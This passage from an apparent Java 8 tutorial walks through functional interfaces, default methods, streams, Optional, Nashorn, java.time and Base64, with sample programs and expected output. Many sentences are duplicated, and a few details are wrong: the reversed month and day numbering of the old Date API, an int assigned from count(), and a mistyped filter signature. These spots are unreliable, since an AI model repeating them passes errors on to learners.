predicate (Boolean-valued function) of one double-valued argument. DoubleSupplier Represents a supplier of double-valued results. DoubleToIntFunction Represents a function that accepts a double-valued argument and produces an int-valued result. DoubleToLongFunction Represents a function that accepts a double-valued argument and produces a long-valued result. DoubleUnaryOperator Represents an operation on a single double-valued operand that produces a double-valued result. Function<T,R> Represents a function that accepts one argument and produces a result. IntBinaryOperator Represents an operation upon two int-valued operands and produces an int-valued result. IntConsumer Represents an operation that accepts a single int-valued argument and returns no result. IntFunction<R> Represents a function that accepts an int-valued argument and produces a result. 
IntPredicate Represents a predicate (Boolean-valued function) of one int-valued argument. IntSupplier Represents a supplier of int-valued results. IntToDoubleFunction Represents a function that accepts an int-valued argument and produces a double-valued result. IntToLongFunction Represents a function that accepts an int-valued argument and produces a long-valued result. IntUnaryOperator Represents an operation on a single int-valued operand that produces an int-valued result. LongBinaryOperator Represents an operation upon two long-valued operands and produces a long-valued result. LongConsumer Represents an operation that accepts a single long-valued argument and returns no result. LongFunction<R> Represents a function that accepts a long-valued argument and produces a result. LongPredicate Represents a predicate (Boolean-valued function) of one long-valued argument. LongSupplier Represents a supplier of long-valued results. LongToDoubleFunction Represents a function that accepts a long-valued argument and produces a double-valued result. LongToIntFunction Represents a function that accepts a long-valued argument and produces an int-valued result. LongUnaryOperator Represents an operation on a single long-valued operand that produces a long-valued result. ObjDoubleConsumer<T> Represents an operation that accepts an object-valued and a double-valued argument, and returns no result. ObjIntConsumer<T> Represents an operation that accepts an object-valued and an int-valued argument, and returns no result. ObjLongConsumer<T> Represents an operation that accepts an object-valued and a long-valued argument, and returns no result. Predicate<T> Represents a predicate (Boolean-valued function) of one argument. Supplier<T> Represents a supplier of results. ToDoubleBiFunction<T,U> Represents a function that accepts two arguments and produces a double-valued result. ToDoubleFunction<T> Represents a function that produces a double-valued result. ToIntBiFunction<T,U> Represents a function that accepts two arguments and produces an int-valued result. ToIntFunction<T> Represents a function that produces an int-valued result. ToLongBiFunction<T,U> Represents a function that accepts two arguments and produces a long-valued result. ToLongFunction<T> Represents a function that produces a long-valued result. UnaryOperator<T> Represents an operation on a single operand that produces a result of the same type as its operand. Predicate <T> interface is a functional interface with a method test(Object) to return a Boolean value. This interface signifies that an object is tested to be true or false. Create the following Java program using any editor of your choice in, say, C:\> JAVA. import java.util.Arrays; import java.util.List; import java.util.function.Predicate; public class Java8Tester { public static void main(String args[]) { List<Integer> list = Arrays.asList(1, 2, 3, 4, 5, 6, 7, 8, 9); // Predicate<Integer> predicate = n -> true // n is passed as parameter to test method of Predicate interface // test method will always return true no matter what value n has. 
System.out.println("Print all numbers:"); //pass n as parameter eval(list, n->true); // Predicate<Integer> predicate1 = n -> n%2 == 0 // n is passed as parameter to test method of Predicate interface // test method will return true if n%2 comes to be zero System.out.println("Print even numbers:"); eval(list, n-> n%2 == 0 ); // Predicate<Integer> predicate2 = n -> n > 3 // n is passed as parameter to test method of Predicate interface // test method will return true if n is greater than 3. System.out.println("Print numbers greater than 3:"); eval(list, n-> n > 3 ); } public static void eval(List<Integer> list, Predicate<Integer> predicate) { for(Integer n: list) { if(predicate.test(n)) { System.out.println(n + " "); } } } } Here we've passed Predicate interface, which takes a single input and returns Boolean. Compile the class using javac compiler as follows − C:\JAVA>javac Java8Tester.java Now run the Java8Tester as follows − C:\JAVA>java Java8Tester It should produce the following output − Print all numbers: 1 2 3 4 5 6 7 8 9 Print even numbers: 2 4 6 8 Print numbers greater than 3: 4 5 6 7 8 9 Java 8 introduces a new concept of default method implementation in interfaces. This capability is added for backward compatibility so that old interfaces can be used to leverage the lambda expression capability of Java 8. For example, ‘List’ or ‘Collection’ interfaces do not have ‘forEach’ method declaration. Thus, adding such method will simply break the collection framework implementations. Java 8 introduces default method so that List/Collection interface can have a default implementation of forEach method, and the class implementing these interfaces need not implement the same. public interface vehicle { default void print() { System.out.println("I am a vehicle!"); } } With default functions in interfaces, there is a possibility that a class is implementing two interfaces with same default methods. The following code explains how this ambiguity can be resolved. public interface vehicle { default void print() { System.out.println("I am a vehicle!"); } } public interface fourWheeler { default void print() { System.out.println("I am a four wheeler!"); } } First solution is to create an own method that overrides the default implementation. public class car implements vehicle, fourWheeler { public void print() { System.out.println("I am a four wheeler car vehicle!"); } } Second solution is to call the default method of the specified interface using super. public class car implements vehicle, fourWheeler { public void print() { vehicle.super.print(); } } An interface can also have static helper methods from Java 8 onwards. public interface vehicle { default void print() { System.out.println("I am a vehicle!"); } static void blowHorn() { System.out.println("Blowing horn!!!"); } } Create the following Java program using any editor of your choice in, say, C:\> JAVA. 
public class Java8Tester { public static void main(String args[]) { Vehicle vehicle = new Car(); vehicle.print(); } } interface Vehicle { default void print() { System.out.println("I am a vehicle!"); } static void blowHorn() { System.out.println("Blowing horn!!!"); } } interface FourWheeler { default void print() { System.out.println("I am a four wheeler!"); } } class Car implements Vehicle, FourWheeler { public void print() { Vehicle.super.print(); FourWheeler.super.print(); Vehicle.blowHorn(); System.out.println("I am a car!"); } } Compile the class using javac compiler as follows − C:\JAVA>javac Java8Tester.java Now run the Java8Tester as follows − C:\JAVA>java Java8Tester It should produce the following output − I am a vehicle! I am a four wheeler! Blowing horn!!! I am a car! Stream is a new abstract layer introduced in Java 8. Using stream, you can process data in a declarative way similar to SQL statements. For example, consider the following SQL statement. SELECT max(salary), employee_id, employee_name FROM Employee The above SQL expression automatically returns the maximum salaried employee's details, without doing any computation on the developer's end. Using collections framework in Java, a developer has to use loops and make repeated checks. Another concern is efficiency; as multi-core processors are available at ease, a Java developer has to write parallel code processing that can be pretty error-prone. To resolve such issues, Java 8 introduced the concept of stream that lets the developer to process data declaratively and leverage multicore architecture without the need to write any specific code for it. Stream represents a sequence of objects from a source, which supports aggregate operations. Following are the characteristics of a Stream − Sequence of elements − A stream provides a set of elements of specific type in a sequential manner. A stream gets/computes elements on demand. It never stores the elements. Sequence of elements − A stream provides a set of elements of specific type in a sequential manner. A stream gets/computes elements on demand. It never stores the elements. Source − Stream takes Collections, Arrays, or I/O resources as input source. Source − Stream takes Collections, Arrays, or I/O resources as input source. Aggregate operations − Stream supports aggregate operations like filter, map, limit, reduce, find, match, and so on. Aggregate operations − Stream supports aggregate operations like filter, map, limit, reduce, find, match, and so on. Pipelining − Most of the stream operations return stream itself so that their result can be pipelined. These operations are called intermediate operations and their function is to take input, process them, and return output to the target. collect() method is a terminal operation which is normally present at the end of the pipelining operation to mark the end of the stream. Pipelining − Most of the stream operations return stream itself so that their result can be pipelined. These operations are called intermediate operations and their function is to take input, process them, and return output to the target. collect() method is a terminal operation which is normally present at the end of the pipelining operation to mark the end of the stream. Automatic iterations − Stream operations do the iterations internally over the source elements provided, in contrast to Collections where explicit iteration is required. 
Automatic iterations − Stream operations do the iterations internally over the source elements provided, in contrast to Collections where explicit iteration is required. With Java 8, Collection interface has two methods to generate a Stream. stream() − Returns a sequential stream considering collection as its source. stream() − Returns a sequential stream considering collection as its source. parallelStream() − Returns a parallel Stream considering collection as its source. parallelStream() − Returns a parallel Stream considering collection as its source. List<String> strings = Arrays.asList("abc", "", "bc", "efg", "abcd","", "jkl"); List<String> filtered = strings.stream().filter(string -> !string.isEmpty()).collect(Collectors.toList()); Stream has provided a new method ‘forEach’ to iterate each element of the stream. The following code segment shows how to print 10 random numbers using forEach. Random random = new Random(); random.ints().limit(10).forEach(System.out::println); The ‘map’ method is used to map each element to its corresponding result. The following code segment prints unique squares of numbers using map. List<Integer> numbers = Arrays.asList(3, 2, 2, 3, 7, 3, 5); //get list of unique squares List<Integer> squaresList = numbers.stream().map( i -> i*i).distinct().collect(Collectors.toList()); The ‘filter’ method is used to eliminate elements based on a criteria. The following code segment prints a count of empty strings using filter. List<String>strings = Arrays.asList("abc", "", "bc", "efg", "abcd","", "jkl"); //get count of empty string int count = strings.stream().filter(string -> string.isEmpty()).count(); The ‘limit’ method is used to reduce the size of the stream. The following code segment shows how to print 10 random numbers using limit. Random random = new Random(); random.ints().limit(10).forEach(System.out::println); The ‘sorted’ method is used to sort the stream. The following code segment shows how to print 10 random numbers in a sorted order. Random random = new Random(); random.ints().limit(10).sorted().forEach(System.out::println); parallelStream is the alternative of stream for parallel processing. Take a look at the following code segment that prints a count of empty strings using parallelStream. List<String> strings = Arrays.asList("abc", "", "bc", "efg", "abcd","", "jkl"); //get count of empty string long count = strings.parallelStream().filter(string -> string.isEmpty()).count(); It is very easy to switch between sequential and parallel streams. Collectors are used to combine the result of processing on the elements of a stream. Collectors can be used to return a list or a string. List<String>strings = Arrays.asList("abc", "", "bc", "efg", "abcd","", "jkl"); List<String> filtered = strings.stream().filter(string -> !string.isEmpty()).collect(Collectors.toList()); System.out.println("Filtered List: " + filtered); String mergedString = strings.stream().filter(string -> !string.isEmpty()).collect(Collectors.joining(", ")); System.out.println("Merged String: " + mergedString); With Java 8, statistics collectors are introduced to calculate all statistics when stream processing is being done. 
List numbers = Arrays.asList(3, 2, 2, 3, 7, 3, 5); IntSummaryStatistics stats = numbers.stream().mapToInt((x) -> x).summaryStatistics(); System.out.println("Highest number in List : " + stats.getMax()); System.out.println("Lowest number in List : " + stats.getMin()); System.out.println("Sum of all numbers : " + stats.getSum()); System.out.println("Average of all numbers : " + stats.getAverage()); Create the following Java program using any editor of your choice in, say, C:\> JAVA. import java.util.ArrayList; import java.util.Arrays; import java.util.IntSummaryStatistics; import java.util.List; import java.util.Random; import java.util.stream.Collectors; import java.util.Map; public class Java8Tester { public static void main(String args[]) { System.out.println("Using Java 7: "); // Count empty strings List<String> strings = Arrays.asList("abc", "", "bc", "efg", "abcd","", "jkl"); System.out.println("List: " +strings); long count = getCountEmptyStringUsingJava7(strings); System.out.println("Empty Strings: " + count); count = getCountLength3UsingJava7(strings); System.out.println("Strings of length 3: " + count); //Eliminate empty string List<String> filtered = deleteEmptyStringsUsingJava7(strings); System.out.println("Filtered List: " + filtered); //Eliminate empty string and join using comma. String mergedString = getMergedStringUsingJava7(strings,", "); System.out.println("Merged String: " + mergedString); List<Integer> numbers = Arrays.asList(3, 2, 2, 3, 7, 3, 5); //get list of square of distinct numbers List<Integer> squaresList = getSquares(numbers); System.out.println("Squares List: " + squaresList); List<Integer> integers = Arrays.asList(1,2,13,4,15,6,17,8,19); System.out.println("List: " +integers); System.out.println("Highest number in List : " + getMax(integers)); System.out.println("Lowest number in List : " + getMin(integers)); System.out.println("Sum of all numbers : " + getSum(integers)); System.out.println("Average of all numbers : " + getAverage(integers)); System.out.println("Random Numbers: "); //print ten random numbers Random random = new Random(); for(int i = 0; i < 10; i++) { System.out.println(random.nextInt()); } System.out.println("Using Java 8: "); System.out.println("List: " +strings); count = strings.stream().filter(string->string.isEmpty()).count(); System.out.println("Empty Strings: " + count); count = strings.stream().filter(string -> string.length() == 3).count(); System.out.println("Strings of length 3: " + count); filtered = strings.stream().filter(string ->!string.isEmpty()).collect(Collectors.toList()); System.out.println("Filtered List: " + filtered); mergedString = strings.stream().filter(string ->!string.isEmpty()).collect(Collectors.joining(", ")); System.out.println("Merged String: " + mergedString); squaresList = numbers.stream().map( i ->i*i).distinct().collect(Collectors.toList()); System.out.println("Squares List: " + squaresList); System.out.println("List: " +integers); IntSummaryStatistics stats = integers.stream().mapToInt((x) ->x).summaryStatistics(); System.out.println("Highest number in List : " + stats.getMax()); System.out.println("Lowest number in List : " + stats.getMin()); System.out.println("Sum of all numbers : " + stats.getSum()); System.out.println("Average of all numbers : " + stats.getAverage()); System.out.println("Random Numbers: "); random.ints().limit(10).sorted().forEach(System.out::println); //parallel processing count = strings.parallelStream().filter(string -> string.isEmpty()).count(); System.out.println("Empty Strings: 
" + count); } private static int getCountEmptyStringUsingJava7(List<String> strings) { int count = 0; for(String string: strings) { if(string.isEmpty()) { count++; } } return count; } private static int getCountLength3UsingJava7(List<String> strings) { int count = 0; for(String string: strings) { if(string.length() == 3) { count++; } } return count; } private static List<String> deleteEmptyStringsUsingJava7(List<String> strings) { List<String> filteredList = new ArrayList<String>(); for(String string: strings) { if(!string.isEmpty()) { filteredList.add(string); } } return filteredList; } private static String getMergedStringUsingJava7(List<String> strings, String separator) { StringBuilder stringBuilder = new StringBuilder(); for(String string: strings) { if(!string.isEmpty()) { stringBuilder.append(string); stringBuilder.append(separator); } } String mergedString = stringBuilder.toString(); return mergedString.substring(0, mergedString.length()-2); } private static List<Integer> getSquares(List<Integer> numbers) { List<Integer> squaresList = new ArrayList<Integer>(); for(Integer number: numbers) { Integer square = new Integer(number.intValue() * number.intValue()); if(!squaresList.contains(square)) { squaresList.add(square); } } return squaresList; } private static int getMax(List<Integer> numbers) { int max = numbers.get(0); for(int i = 1;i < numbers.size();i++) { Integer number = numbers.get(i); if(number.intValue() > max) { max = number.intValue(); } } return max; } private static int getMin(List<Integer> numbers) { int min = numbers.get(0); for(int i= 1;i < numbers.size();i++) { Integer number = numbers.get(i); if(number.intValue() < min) { min = number.intValue(); } } return min; } private static int getSum(List numbers) { int sum = (int)(numbers.get(0)); for(int i = 1;i < numbers.size();i++) { sum += (int)numbers.get(i); } return sum; } private static int getAverage(List<Integer> numbers) { return getSum(numbers) / numbers.size(); } } Compile the class using javac compiler as follows − C:\JAVA>javac Java8Tester.java Now run the Java8Tester as follows − C:\JAVA>java Java8Tester It should produce the following result − Using Java 7: List: [abc, , bc, efg, abcd, , jkl] Empty Strings: 2 Strings of length 3: 3 Filtered List: [abc, bc, efg, abcd, jkl] Merged String: abc, bc, efg, abcd, jkl Squares List: [9, 4, 49, 25] List: [1, 2, 13, 4, 15, 6, 17, 8, 19] Highest number in List : 19 Lowest number in List : 1 Sum of all numbers : 85 Average of all numbers : 9 Random Numbers: -1279735475 903418352 -1133928044 -1571118911 628530462 18407523 -881538250 -718932165 270259229 421676854 Using Java 8: List: [abc, , bc, efg, abcd, , jkl] Empty Strings: 2 Strings of length 3: 3 Filtered List: [abc, bc, efg, abcd, jkl] Merged String: abc, bc, efg, abcd, jkl Squares List: [9, 4, 49, 25] List: [1, 2, 13, 4, 15, 6, 17, 8, 19] Highest number in List : 19 Lowest number in List : 1 Sum of all numbers : 85 Average of all numbers : 9.444444444444445 Random Numbers: -1009474951 -551240647 -2484714 181614550 933444268 1227850416 1579250773 1627454872 1683033687 1798939493 Empty Strings: 2 Optional is a container object used to contain not-null objects. Optional object is used to represent null with absent value. This class has various utility methods to facilitate code to handle values as ‘available’ or ‘not available’ instead of checking null values. It is introduced in Java 8 and is similar to what Optional is in Guava. 
Following is the declaration for java.util.Optional<T> class − public final class Optional<T> extends Object static <T> Optional<T> empty() Returns an empty Optional instance. boolean equals(Object obj) Indicates whether some other object is "equal to" this Optional. Optional<T> filter(Predicate<? super <T> predicate) If a value is present and the value matches a given predicate, it returns an Optional describing the value, otherwise returns an empty Optional. <U> Optional<U> flatMap(Function<? super T,Optional<U>> mapper) If a value is present, it applies the provided Optional-bearing mapping function to it, returns that result, otherwise returns an empty Optional. T get() If a value is present in this Optional, returns the value, otherwise throws NoSuchElementException. int hashCode() Returns the hash code value of the present value, if any, or 0 (zero) if no value is present. void ifPresent(Consumer<? super T> consumer) If a value is present, it invokes the specified consumer with the value, otherwise does nothing. boolean isPresent() Returns true if there is a value present, otherwise false. <U>Optional<U> map(Function<? super T,? extends U> mapper) If a value is present, applies the provided mapping function to it, and if the result is non-null, returns an Optional describing the result. static <T> Optional<T> of(T value) Returns an Optional with the specified present non-null value. static <T> Optional<T> ofNullable(T value) Returns an Optional describing the specified value, if non-null, otherwise returns an empty Optional. T orElse(T other) Returns the value if present, otherwise returns other. T orElseGet(Supplier<? extends T> other) Returns the value if present, otherwise invokes other and returns the result of that invocation. <X extends Throwable> T orElseThrow(Supplier<? extends X> exceptionSupplier) Returns the contained value, if present, otherwise throws an exception to be created by the provided supplier. String toString() Returns a non-empty string representation of this Optional suitable for debugging. This class inherits methods from the following class − java.lang.Object Create the following Java program using any editor of your choice in, say, C:\> JAVA. import java.util.Optional; public class Java8Tester { public static void main(String args[]) { Java8Tester java8Tester = new Java8Tester(); Integer value1 = null; Integer value2 = new Integer(10); //Optional.ofNullable - allows passed parameter to be null. Optional<Integer> a = Optional.ofNullable(value1); //Optional.of - throws NullPointerException if passed parameter is null Optional<Integer> b = Optional.of(value2); System.out.println(java8Tester.sum(a,b)); } public Integer sum(Optional<Integer> a, Optional<Integer> b) { //Optional.isPresent - checks the value is present or not System.out.println("First parameter is present: " + a.isPresent()); System.out.println("Second parameter is present: " + b.isPresent()); //Optional.orElse - returns the value if present otherwise returns //the default value passed. Integer value1 = a.orElse(new Integer(0)); //Optional.get - gets the value, value should be present Integer value2 = b.get(); return value1 + value2; } } Compile the class using javac compiler as follows − C:\JAVA>javac Java8Tester.java Now run the Java8Tester as follows − C:\JAVA>java Java8Tester It should produce the following output − First parameter is present: false Second parameter is present: true 10 With Java 8, Nashorn, a much improved javascript engine is introduced, to replace the existing Rhino. 
Nashorn provides 2 to 10 times better performance, as it directly compiles the code in memory and passes the bytecode to JVM. Nashorn uses invoke dynamics feature, introduced in Java 7 to improve performance. For Nashorn engine, JAVA 8 introduces a new command line tool, jjs, to execute javascript codes at console. Create and save the file sample.js in c:\> JAVA folder. print('Hello World!'); Open console and use the following command. C:\JAVA>jjs sample.js It will produce the following output: Hello World! Open the console and use the following command. C:\JAVA>jjs jjs> print("Hello, World!") Hello, World! jjs> quit() >> Open the console and use the following command. C:\JAVA> jjs -- a b c jjs> print('letters: ' +arguments.join(", ")) letters: a, b, c jjs> Using ScriptEngineManager, JavaScript code can be called and interpreted in Java. Create the following Java program using any editor of your choice in, say, C:\> JAVA. import javax.script.ScriptEngineManager; import javax.script.ScriptEngine; import javax.script.ScriptException; public class Java8Tester { public static void main(String args[]) { ScriptEngineManager scriptEngineManager = new ScriptEngineManager(); ScriptEngine nashorn = scriptEngineManager.getEngineByName("nashorn"); String name = "Mahesh"; Integer result = null; try { nashorn.eval("print('" + name + "')"); result = (Integer) nashorn.eval("10 + 2"); } catch(ScriptException e) { System.out.println("Error executing script: "+ e.getMessage()); } System.out.println(result.toString()); } } Compile the class using javac compiler as follows − C:\JAVA>javac Java8Tester.java Now run the Java8Tester as follows − C:\JAVA>java Java8Tester It should produce the following result − Mahesh 12 The following example explains how to import and use Java classes in java script. Create and save sample.js in c:\> JAVA folder. var BigDecimal = Java.type('java.math.BigDecimal'); function calculate(amount, percentage) { var result = new BigDecimal(amount).multiply(new BigDecimal(percentage)).divide( new BigDecimal("100"), 2, BigDecimal.ROUND_HALF_EVEN); return result.toPlainString(); } var result = calculate(568000000000000000023,13.9); print(result); Open the console and use the following command. C:\JAVA>jjs sample.js It should produce the following output − 78952000000000000003.20 With Java 8, a new Date-Time API is introduced to cover the following drawbacks of old date-time API. Not thread safe − java.util.Date is not thread safe, thus developers have to deal with concurrency issue while using date. The new date-time API is immutable and does not have setter methods. Not thread safe − java.util.Date is not thread safe, thus developers have to deal with concurrency issue while using date. The new date-time API is immutable and does not have setter methods. Poor design − Default Date starts from 1900, month starts from 1, and day starts from 0, so no uniformity. The old API had less direct methods for date operations. The new API provides numerous utility methods for such operations. Poor design − Default Date starts from 1900, month starts from 1, and day starts from 0, so no uniformity. The old API had less direct methods for date operations. The new API provides numerous utility methods for such operations. Difficult time zone handling − Developers had to write a lot of code to deal with timezone issues. The new API has been developed keeping domain-specific design in mind. Difficult time zone handling − Developers had to write a lot of code to deal with timezone issues. 
The new API has been developed keeping domain-specific design in mind. Java 8 introduces a new date-time API under the package java.time. Following are some of the important classes introduced in java.time package. Local − Simplified date-time API with no complexity of timezone handling. Local − Simplified date-time API with no complexity of timezone handling. Zoned − Specialized date-time API to deal with various timezones. Zoned − Specialized date-time API to deal with various timezones. LocalDate/LocalTime and LocalDateTime classes simplify the development where timezones are not required. Let's see them in action. Create the following java program using any editor of your choice in, say, C:\> JAVA. import java.time.LocalDate; import java.time.LocalTime; import java.time.LocalDateTime; import java.time.Month; public class Java8Tester { public static void main(String args[]) { Java8Tester java8tester = new Java8Tester(); java8tester.testLocalDateTime(); } public void testLocalDateTime() { // Get the current date and time LocalDateTime currentTime = LocalDateTime.now(); System.out.println("Current DateTime: " + currentTime); LocalDate date1 = currentTime.toLocalDate(); System.out.println("date1: " + date1); Month month = currentTime.getMonth(); int day = currentTime.getDayOfMonth(); int seconds = currentTime.getSecond(); System.out.println("Month: " + month +"day: " + day +"seconds: " + seconds); LocalDateTime date2 = currentTime.withDayOfMonth(10).withYear(2012); System.out.println("date2: " + date2); //12 december 2014 LocalDate date3 = LocalDate.of(2014, Month.DECEMBER, 12); System.out.println("date3: " + date3); //22 hour 15 minutes LocalTime date4 = LocalTime.of(22, 15); System.out.println("date4: " + date4); //parse a string LocalTime date5 = LocalTime.parse("20:15:30"); System.out.println("date5: " + date5); } } Compile the class using javac compiler as follows − C:\JAVA>javac Java8Tester.java Now run the Java8Tester as follows − C:\JAVA>java Java8Tester It should produce the following output − Current DateTime: 2014-12-09T11:00:45.457 date1: 2014-12-09 Month: DECEMBERday: 9seconds: 45 date2: 2012-12-10T11:00:45.457 date3: 2014-12-12 date4: 22:15 date5: 20:15:30 Zoned date-time API is to be used when time zone is to be considered. Let us see them in action. Create the following Java program using any editor of your choice in, say, C:\> JAVA. import java.time.ZonedDateTime; import java.time.ZoneId; public class Java8Tester { public static void main(String args[]) { Java8Tester java8tester = new Java8Tester(); java8tester.testZonedDateTime(); } public void testZonedDateTime() { // Get the current date and time ZonedDateTime date1 = ZonedDateTime.parse("2007-12-03T10:15:30+05:30[Asia/Karachi]"); System.out.println("date1: " + date1); ZoneId id = ZoneId.of("Europe/Paris"); System.out.println("ZoneId: " + id); ZoneId currentZone = ZoneId.systemDefault(); System.out.println("CurrentZone: " + currentZone); } } Compile the class using javac compiler as follows − C:\JAVA>javac Java8Tester.java Now run the Java8Tester as follows − C:\JAVA>java Java8Tester It should produce the following output − date1: 2007-12-03T10:15:30+05:00[Asia/Karachi] ZoneId: Europe/Paris CurrentZone: Etc/UTC java.time.temporal.ChronoUnit enum is added in Java 8 to replace the integer values used in old API to represent day, month, etc. Let us see them in action. Create the following Java program using any editor of your choice in, say, C:\> JAVA. 
import java.time.LocalDate; import java.time.temporal.ChronoUnit; public class Java8Tester { public static void main(String args[]) { Java8Tester java8tester = new Java8Tester(); java8tester.testChromoUnits(); } public void testChromoUnits() { //Get the current date LocalDate today = LocalDate.now(); System.out.println("Current date: " + today); //add 1 week to the current date LocalDate nextWeek = today.plus(1, ChronoUnit.WEEKS); System.out.println("Next week: " + nextWeek); //add 1 month to the current date LocalDate nextMonth = today.plus(1, ChronoUnit.MONTHS); System.out.println("Next month: " + nextMonth); //add 1 year to the current date LocalDate nextYear = today.plus(1, ChronoUnit.YEARS); System.out.println("Next year: " + nextYear); //add 10 years to the current date LocalDate nextDecade = today.plus(1, ChronoUnit.DECADES); System.out.println("Date after ten year: " + nextDecade); } } Compile the class using javac compiler as follows − C:\JAVA>javac Java8Tester.java Now run the Java8Tester as follows − C:\JAVA>java Java8Tester It should produce the following result − Current date: 2014-12-10 Next week: 2014-12-17 Next month: 2015-01-10 Next year: 2015-12-10 Date after ten year: 2024-12-10 With Java 8, two specialized classes are introduced to deal with the time differences. Period − It deals with date based amount of time. Period − It deals with date based amount of time. Duration − It deals with time based amount of time. Duration − It deals with time based amount of time. Let us see them in action. Create the following Java program using any editor of your choice in, say, C:\> JAVA. import java.time.temporal.ChronoUnit; import java.time.LocalDate; import java.time.LocalTime; import java.time.Duration; import java.time.Period; public class Java8Tester { public static void main(String args[]) { Java8Tester java8tester = new Java8Tester(); java8tester.testPeriod(); java8tester.testDuration(); } public void testPeriod() { //Get the current date LocalDate date1 = LocalDate.now(); System.out.println("Current date: " + date1); //add 1 month to the current date LocalDate date2 = date1.plus(1, ChronoUnit.MONTHS); System.out.println("Next month: " + date2); Period period = Period.between(date2, date1); System.out.println("Period: " + period); } public void testDuration() { LocalTime time1 = LocalTime.now(); Duration twoHours = Duration.ofHours(2); LocalTime time2 = time1.plus(twoHours); Duration duration = Duration.between(time1, time2); System.out.println("Duration: " + duration); } } Compile the class using javac compiler as follows − C:\JAVA>javac Java8Tester.java Now run the Java8Tester as follows − C:\JAVA>java Java8Tester It should produce the following output − Current date: 2014-12-10 Next month: 2015-01-10 Period: P-1M Duration: PT2H TemporalAdjuster is used to perform the date mathematics. For example, get the "Second Saturday of the Month" or "Next Tuesday". Let us see them in action. Create the following Java program using any editor of your choice in, say, C:\> JAVA. 
import java.time.LocalDate; import java.time.temporal.TemporalAdjusters; import java.time.DayOfWeek; public class Java8Tester { public static void main(String args[]) { Java8Tester java8tester = new Java8Tester(); java8tester.testAdjusters(); } public void testAdjusters() { //Get the current date LocalDate date1 = LocalDate.now(); System.out.println("Current date: " + date1); //get the next tuesday LocalDate nextTuesday = date1.with(TemporalAdjusters.next(DayOfWeek.TUESDAY)); System.out.println("Next Tuesday on : " + nextTuesday); //get the second saturday of the current month LocalDate firstOfMonth = LocalDate.of(date1.getYear(),date1.getMonth(), 1); LocalDate secondSaturday = firstOfMonth.with(TemporalAdjusters.nextOrSame( DayOfWeek.SATURDAY)).with(TemporalAdjusters.next(DayOfWeek.SATURDAY)); System.out.println("Second Saturday on : " + secondSaturday); } } Compile the class using javac compiler as follows − C:\JAVA>javac Java8Tester.java Now run the Java8Tester as follows − C:\JAVA>java Java8Tester It should produce the following result − Current date: 2014-12-10 Next Tuesday on : 2014-12-16 Second Saturday on : 2014-12-13 A toInstant() method is added to the original Date and Calendar objects, which can be used to convert them to the new Date-Time API. Use the ofInstant(Instant, ZoneId) method to get a LocalDateTime or ZonedDateTime object. Let us see them in action. Create the following Java program using any editor of your choice in, say, C:\> JAVA. import java.time.LocalDateTime; import java.time.ZonedDateTime; import java.util.Date; import java.time.Instant; import java.time.ZoneId; public class Java8Tester { public static void main(String args[]) { Java8Tester java8tester = new Java8Tester(); java8tester.testBackwardCompatibility(); } public void testBackwardCompatibility() { //Get the current date Date currentDate = new Date(); System.out.println("Current date: " + currentDate); //Get the instant of the current date in terms of milliseconds Instant now = currentDate.toInstant(); ZoneId currentZone = ZoneId.systemDefault(); LocalDateTime localDateTime = LocalDateTime.ofInstant(now, currentZone); System.out.println("Local date: " + localDateTime); ZonedDateTime zonedDateTime = ZonedDateTime.ofInstant(now, currentZone); System.out.println("Zoned date: " + zonedDateTime); } } Compile the class using javac compiler as follows − C:\JAVA>javac Java8Tester.java Now run the Java8Tester as follows − C:\JAVA>java Java8Tester It should produce the following output − Current date: Wed Dec 10 05:44:06 UTC 2014 Local date: 2014-12-10T05:44:06.635 Zoned date: 2014-12-10T05:44:06.635Z[Etc/UTC] With Java 8, Base64 has finally got its due. Java 8 now has an inbuilt encoder and decoder for Base64 encoding. In Java 8, we can use three types of Base64 encoding. Simple − Output is mapped to a set of characters lying in A-Za-z0-9+/. The encoder does not add any line feed in output, and the decoder rejects any character other than A-Za-z0-9+/. Simple − Output is mapped to a set of characters lying in A-Za-z0-9+/. The encoder does not add any line feed in output, and the decoder rejects any character other than A-Za-z0-9+/. URL − Output is mapped to a set of characters lying in A-Za-z0-9-_, that is, '-' and '_' are used in place of '+' and '/'. Output is URL and filename safe. URL − Output is mapped to a set of characters lying in A-Za-z0-9-_, that is, '-' and '_' are used in place of '+' and '/'. Output is URL and filename safe. MIME − Output is mapped to MIME friendly format. Output is represented in lines of no more than 76 characters each, and uses a carriage return '\r' followed by a linefeed '\n' as the line separator.
No line separator is present to the end of the encoded output. MIME − Output is mapped to MIME friendly format. Output is represented in lines of no more than 76 characters each, and uses a carriage return '\r' followed by a linefeed '\n' as the line separator. No line separator is present to the end of the encoded output. static class Base64.Decoder This class implements a decoder for decoding byte data using the Base64 encoding scheme as specified in RFC 4648 and RFC 2045. static class Base64.Encoder This class implements an encoder for encoding byte data using the Base64 encoding scheme as specified in RFC 4648 and RFC 2045. static Base64.Decoder getDecoder() Returns a Base64.Decoder that decodes using the Basic type base64 encoding scheme. static Base64.Encoder getEncoder() Returns a Base64.Encoder that encodes using the Basic type base64 encoding scheme. static Base64.Decoder getMimeDecoder() Returns a Base64.Decoder that decodes using the MIME type base64 decoding scheme. static Base64.Encoder getMimeEncoder() Returns a Base64.Encoder that encodes using the MIME type base64 encoding scheme. static Base64.Encoder getMimeEncoder(int lineLength, byte[] lineSeparator) Returns a Base64.Encoder that encodes using the MIME type base64 encoding scheme with specified line length and line separators. static Base64.Decoder getUrlDecoder() Returns a Base64.Decoder that decodes using the URL and Filename safe type base64 encoding scheme. static Base64.Encoder getUrlEncoder() Returns a Base64.Encoder that encodes using the URL and Filename safe type base64 encoding scheme. This class inherits methods from the following class − java.lang.Object Create the following Java program using any editor of your choice in say C:/> JAVA. import java.util.Base64; import java.util.UUID; import java.io.UnsupportedEncodingException; public class HelloWorld { public static void main(String args[]) { try { // Encode using basic encoder String base64encodedString = Base64.getEncoder().encodeToString( "TutorialsPoint?java8".getBytes("utf-8")); System.out.println("Base64 Encoded String (Basic) :" + base64encodedString); // Decode byte[] base64decodedBytes = Base64.getDecoder().decode(base64encodedString); System.out.println("Original String: " + new String(base64decodedBytes, "utf-8")); base64encodedString = Base64.getUrlEncoder().encodeToString( "TutorialsPoint?java8".getBytes("utf-8")); System.out.println("Base64 Encoded String (URL) :" + base64encodedString); StringBuilder stringBuilder = new StringBuilder(); for (int i = 0; i < 10; ++i) { stringBuilder.append(UUID.randomUUID().toString()); } byte[] mimeBytes = stringBuilder.toString().getBytes("utf-8"); String mimeEncodedString = Base64.getMimeEncoder().encodeToString(mimeBytes); System.out.println("Base64 Encoded String (MIME) :" + mimeEncodedString); } catch(UnsupportedEncodingException e) { System.out.println("Error :" + e.getMessage()); } } } Compile the class using javac compiler as follows − C:\JAVA>javac Java8Tester.java Now run the Java8Tester as follows − 